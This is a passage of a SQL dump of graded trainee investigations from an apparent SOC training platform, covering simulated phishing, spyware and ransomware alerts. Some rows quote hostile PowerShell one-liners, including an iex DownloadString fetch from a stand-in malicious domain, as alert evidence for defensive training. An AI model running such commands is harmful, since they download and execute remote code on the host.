(584, 303, 274, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:27:41 PM\\nALERT: Phishing Attempt via Weaponized Job Offers [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [EMAIL] recruiter@example.com\\n- [FILENAME] JobOffer.docm\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:57:42.261Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:56:25', '2026-03-15 17:57:42', 0, NULL),
(585, 303, 275, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.5\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_1\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:28:56 PM\\nALERT: Malicious Code Execution on Developer Systems [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.5\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\\n- [USERNAME] dev_user01\\n- [FILENAME] malicious_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:58:57.599Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:57:42', '2026-03-15 17:58:57', 0, NULL),
(586, 303, 276, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-10.0.0.5\",\"ip-203.0.113.45\",\"hash-3f5d8f3e\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:29:56 PM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 10.0.0.5\\n- [IP] 203.0.113.45\\n- [HASH] 3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\\n- [USERNAME] jdoe\\n- [FILENAME] persistence_tool.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:59:57.689Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:58:57', '2026-03-15 17:59:57', 0, NULL),
(587, 303, 277, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:30:53 PM\\nALERT: Cryptocurrency Exfiltration and Laundering [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [EMAIL] attacker@malicious.com\\n- [FILENAME] exfil_transaction_details.csv\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T18:00:54.979Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:59:57', '2026-03-15 18:00:54', 0, NULL),
(588, 303, 278, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-15 18:01:05', '2026-03-15 18:01:05', 0, NULL),
(589, 232, 246, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The sender IP is known for phising attacks \",\"artifacts\":\"Raw Log Evidence {\\\"timestamp\\\":\\\"2023-10-05T09:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.10\\\",\\\"email_sender\\\":\\\"phisher@example.com\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\",\\\"username\\\":\\\"asmith\",\"analysis_answers\":{\"action_taken\":\"The sender IP is known for phising attacks \",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T18:12:05.270Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 21:13:11', '2026-03-15 18:05:11', '2026-03-15 18:14:00', 0, NULL),
(590, 232, 249, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"It shows that someone is trying to. Execute code via powershell and there is from attacker\",\"artifacts\":\"{\\\"log_type\\\":\\\"process_creation\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:09Z\\\",\\\"hostname\\\":\\\"Corporate-Laptop-04\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"powershell.exe\\\",\\\"cmdline\\\":\\\"powershell -nop -c \\\\\\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\\\\\\"\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"parent_process_id\\\":4821,\\\"process_id\\\":9342,\\\"integrity_level\\\":\\\"High\\\",\\\"network_activity\\\":[{\\\"protocol\\\":\\\"HTTP\\\",\\\"dest_ip\\\":\\\"192.168.1.105\\\",\\\"dest_port\\\":80,\\\"url\\\":\\\"http://maliciousdomain.com/script.ps1\\\"}]}\",\"analysis_answers\":{\"action_taken\":\"It shows that someone is trying to. Execute code via powershell and there is from attacker\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T18:19:16.158Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 21:23:41', '2026-03-15 18:14:41', '2026-03-15 18:20:00', 0, NULL),
(591, 283, 304, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 22:21:10', '2026-03-15 19:11:10', '2026-03-15 19:11:10', 0, NULL),
(592, 283, 1532, 'graded', 94, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.2.15\",\"hash-a9f5b3c7\",\"domain-https://mali\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:17:24\\nALERT: Initial Access via Zero-Click iCloud Calendar Exploit [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.2.15\\n- [HASH] a9f5b3c7e812f3d6b7e695f6c29e1e4f\\n- [DOMAIN] https://malicious-calendar-invite.com/icalendar\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:17:28.671Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/5)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:07:37', '2026-03-15 20:17:28', 0, NULL),
(593, 283, 1533, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:25:45\\nALERT: Execution of REIGN Spyware on iOS [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] 8f14e45fceea167a5a36dedd4bea2543\\n- [FILENAME] reign_install.pkg\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:25:56.678Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:17:28', '2026-03-15 20:25:56', 0, NULL),
(594, 283, 1534, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.15\",\"hash-46b7f3c5\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:32:26\\nALERT: Establishing Persistence on iOS Devices [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.15\\n- [HASH] 46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\n- [FILENAME] malicious_profile.mobileconfig\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:32:32.163Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:25:56', '2026-03-15 20:32:32', 0, NULL),
(595, 283, 1535, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:35:15\\nALERT: Lateral Movement to Connected iCloud Services [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [USERNAME] compromisedUser@icloud.com\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:35:15.966Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:32:32', '2026-03-15 20:35:15', 0, NULL),
(596, 283, 1536, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.3.15\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"escalate\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:36:09\\nALERT: Exfiltration of Sensitive Data to External Servers [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.3.15\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] classified_data.zip\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:36:10.227Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:35:15', '2026-03-15 20:36:10', 0, NULL),
(597, 283, 1601, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.1.15.32\",\"hash-3f5cfc5b\",\"domain-http://malic\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:41:38\\nALERT: Initial Access: Phishing Email Detected [OP: Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.1.15.32\\n- [HASH] 3f5cfc5b1b7d4c7a9f4e1b4c4e5a4e9b\\n- [DOMAIN] http://malicious-site.com/benefits-update\\n- [EMAIL] hr-support@fakesite.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:41:39.227Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:39:12', '2026-03-15 20:41:39', 0, NULL),
(598, 283, 1602, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_2\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:43:15\\nALERT: Execution: Fileless PowerShell Activity [OP: Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri http://malicious-domain.com/payload -OutFile $null\\n- [USERNAME] jdoe\\n- [DOMAIN] malicious-domain.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:43:16.194Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:41:39', '2026-03-15 20:43:16', 0, NULL),
(599, 283, 1603, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-193.104.68.132\",\"hash-d41d8cd9\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:44:54\\nALERT: Persistence: Scheduled Task Creation [OP: Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 193.104.68.132\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:44:55.495Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:43:16', '2026-03-15 20:44:55', 0, NULL),
(600, 283, 1604, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-15 20:44:55', '2026-03-15 20:44:55', 0, NULL),
(601, 28, 268, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_3\",\"artifact_1\",\"ip-203.0.113.45\",\"ip-192.168.1.100\",\"ip-10.0.0.15\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15/3/2026, 10:12:14 μ.μ.\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T21:12:22.301Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 21:09:16', '2026-03-15 21:12:22', 0, NULL),
(602, 28, 269, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15/3/2026, 10:14:02 μ.μ.\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T21:14:03.868Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"block_ip\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 21:12:22', '2026-03-15 21:14:03', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(603, 28, 270, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15/3/2026, 10:15:04 μ.μ.\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T21:15:06.766Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 21:14:03', '2026-03-15 21:15:06', 0, NULL),
(604, 214, 1591, 'investigating', NULL, NULL, NULL, NULL, '2026-03-16 04:55:28', '2026-03-16 01:46:28', '2026-03-16 01:46:28', 0, NULL),
(605, 225, 243, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"An attacker attempted username and password guessing 45 times. This indicates an intent to brute force RDP. This is highly malicious because connection was established, but both country and region are unknown.\",\"artifacts\":\"192.168.1.25, 10.0.0.4\",\"analysis_answers\":{\"action_taken\":\"An attacker attempted username and password guessing 45 times. This indicates an intent to brute force RDP. This is highly malicious because connection was established, but both country and region are unknown.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-16T03:06:13.182Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-16 06:06:05', '2026-03-16 02:59:05', '2026-03-16 03:07:00', 0, NULL),
(606, 225, 304, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"This is a spear phishing email. It contains malicious file. The URL is using port 80 and not the secured version HTTPS, which uses port 443. This indicates that the attacker wants to steal the user credentials. This suspicious email is true positive.\",\"artifacts\":\"Q3_Report.docm, d41d8cd98f00b204e9800998ecf8427e, 203.0.113.45, 192.168.1.25, http://maliciousdomain.com/securelogin, finance.partner@maliciousdomain.com, john.doe@company.com\",\"analysis_answers\":{\"action_taken\":\"This is a spear phishing email. It contains malicious file. The URL is using port 80 and not the secured version HTTPS, which uses port 443. This indicates that the attacker wants to steal the user credentials. This suspicious email is true positive.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-16T03:18:07.469Z\"}', 